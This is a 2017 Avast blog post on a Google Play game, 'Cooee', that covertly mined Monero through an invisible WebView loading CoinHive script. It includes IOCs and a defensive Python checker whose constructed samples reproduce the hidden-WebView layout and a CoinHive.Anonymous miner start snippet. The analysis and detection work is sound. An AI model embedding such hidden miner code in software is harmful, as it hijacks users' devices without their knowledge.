
Cryptocurrency mining malware sneaks onto Google Play

Nikolaos Chrysaidos, 3 November 2017

Avast finds and detects an app that mines the Monero cryptocurrency

Cryptocurrency mining is a hot topic at the moment, especially since some websites have recently started mining cryptocurrency in visitors' browsers instead of showing ads. As with many malicious trends, cybercriminals have quickly moved from PC to mobile. This week, we found an app on the Google Play Store that contains cryptocurrency mining capabilities, masquerading as the Cooee game. Between 1,000 and 5,000 users downloaded the app. We detect the malware as JSMiner, and we informed Google of the app yesterday.

[Image: the Cooee app listing on Google Play]

[Image: the Cooee app details page on Google Play]

Cryptocurrency mining

It’s important to understand that mining cryptocurrency is in itself a legitimate business. Mining at a scale that maximizes profit, however, requires substantial computing power, which is why some miners run huge server farms to mine Bitcoin or other cryptocurrencies, such as Litecoin, Ethereum, or Monero. Building and maintaining that infrastructure, and paying for the electricity needed to run it, requires an enormous financial investment.

Because mining cryptocurrency is expensive, some miners resort to abusing the processing power of other people’s devices, spreading mining code through apps and websites. We consider cryptocurrency mining malicious when it is done without the user’s knowledge and permission, which is what happened in this case.

Let the mining begin… or not

To start the mining process, all the user has to do after installing the app is tap the button shown below. The button’s ostensible purpose is to let the user log into the Cooee Club 3D Chat Community panel.

[Image: the app’s login button]

Tapping the button opens a second WebView in the background, which the malware uses to load CoinHive JavaScript code from an external host (listed in the IOC section below). Mining then begins.

Once mining begins, CPU utilization stays very high and the phone heats up noticeably.

The malware mines the cryptocurrency Monero. The cybercriminals’ end goal is financial gain, but what they don’t seem to realize is that mining on a mobile device cannot deliver much profit. Mobile devices lack the processing power that PCs have, and their batteries drain quickly when they are not on a charger, which limits the time available for mining.

In the code below, we can see that the malware opens two WebViews: one with the login panel (Clubcooee) and a second, invisible WebView pointing at the site that hosts the CoinHive JS code.

[Image: decompiled code creating the two WebViews]

The second WebView is hidden (android:visibility="invisible"), so the user sees nothing suspicious, apart perhaps from the phone getting warmer. An invisible WebView still executes the JavaScript it loads; only its rendering is suppressed.

[Image: layout XML with the WebView’s android:visibility set to "invisible"]

Below is the CoinHive JS code used for the mining:

[Image: the CoinHive JavaScript loaded by the hidden WebView]
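The pattern described above (a visible login WebView plus an invisible one that fetches the CoinHive browser miner) is easy to check for statically once the APK has been decoded. The script below is an example added for this article; it is not Avast’s detection logic and not code from the Cooee app. It assumes the layout XML and the HTML/JS fetched by the hidden WebView have already been extracted (for instance with apktool and a proxy capture), and the two sample inputs embedded in it are constructed, with made-up view ids, a fake site key and no real hostnames beyond the public CoinHive library URL.

```python
# Added example for this article: a static indicator check for the pattern
# described above (a hidden WebView that loads the CoinHive browser miner).
# Illustrative analyst tooling, not Avast's detection and not the app's code.
# Inputs: a decoded layout XML (res/layout/*.xml from apktool) and the
# HTML/JS the hidden WebView fetches. The two samples at the bottom are
# constructed; their ids and site key are made up.
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Publicly documented CoinHive indicators: the library URL and the two
# miner constructors, plus the generic .start() call that kicks off mining.
COINHIVE_MARKERS = {
    "library":   re.compile(r"coinhive\.com/lib/coinhive(\.min)?\.js"),
    "anonymous": re.compile(r"CoinHive\.Anonymous\s*\("),
    "user":      re.compile(r"CoinHive\.User\s*\("),
    "start":     re.compile(r"\.start\s*\("),
}


def hidden_webviews(layout_xml: str) -> list:
    """Return android:id values of WebViews declared 'invisible' or 'gone'.

    Only catches hiding declared in the layout; a view hidden at runtime via
    setVisibility() or shrunk to 1x1 dp would need bytecode inspection.
    """
    root = ET.fromstring(layout_xml)
    hidden = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "WebView":
            continue
        visibility = el.get(f"{{{ANDROID_NS}}}visibility", "visible")
        if visibility in ("invisible", "gone"):
            hidden.append(el.get(f"{{{ANDROID_NS}}}id", "<no id>"))
    return hidden


def coinhive_markers(page_source: str) -> list:
    """Return the names of the CoinHive indicators present in loaded HTML/JS."""
    return [name for name, rx in COINHIVE_MARKERS.items() if rx.search(page_source)]


def assess(layout_xml: str, page_source: str) -> dict:
    """Combine both checks into a verdict plus the evidence behind it."""
    hidden = hidden_webviews(layout_xml)
    markers = coinhive_markers(page_source)
    # '.start(' alone is far too generic; require the library or a constructor.
    miner_loaded = any(m in markers for m in ("library", "anonymous", "user"))
    if hidden and miner_loaded:
        verdict = "hidden WebView loads CoinHive miner"
    elif miner_loaded:
        verdict = "CoinHive miner loaded in a visible WebView"
    else:
        verdict = "no CoinHive indicator"
    return {"hidden_webviews": hidden, "markers": markers, "verdict": verdict}


# Constructed sample layout: a visible login WebView plus an invisible one.
SAMPLE_LAYOUT = """<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:orientation="vertical"
    android:layout_width="match_parent"
    android:layout_height="match_parent">
    <WebView android:id="@+id/login_panel"
        android:layout_width="match_parent"
        android:layout_height="match_parent" />
    <WebView android:id="@+id/miner_view"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:visibility="invisible" />
</LinearLayout>
"""

# Constructed sample of what the hidden WebView fetches (site key is fake).
SAMPLE_PAGE = """<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY', {throttle: 0.0});
  miner.start();
</script>
</body></html>
"""

if __name__ == "__main__":
    print(assess(SAMPLE_LAYOUT, SAMPLE_PAGE))
```

Treat the result as a triage signal rather than proof: the layout check misses views hidden at runtime or merely sized to a single pixel, and the JavaScript markers can be defeated by loading a renamed copy of the library or by obfuscating the constructor call. Pairing the static check with the behavioural one the article relies on (sustained CPU load after the login page opens) is what makes the case.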

How to protect yourself

What stands out is how easy it is to integrate CoinHive code into a mobile app and start mining. Given how little implementation effort it takes, we expect this new trend of mining malware on mobile to keep growing, and to be spread as widely as possible, since hundreds of thousands of devices are needed to mine cryptocurrency profitably via smartphones.

To protect your phone from becoming a miner, make sure you install Avast Mobile Security, if you haven’t done so already. Furthermore, keep an eye on the apps you have installed and how much CPU they use. If you notice your phone heating up quickly, especially while it is not in use, check which apps are consuming more processing power than they should and consider removing them.

IOC

SHA256: 78CBF53BBEC98D641241F7A4D34655684FAE1CD85A3782A1E49C1C7BCBC7F5D2

Host: http://pagebin.com/eGHvp4jC

[Video: CPU usage before the app is installed, after it is installed, and after the login page is opened.]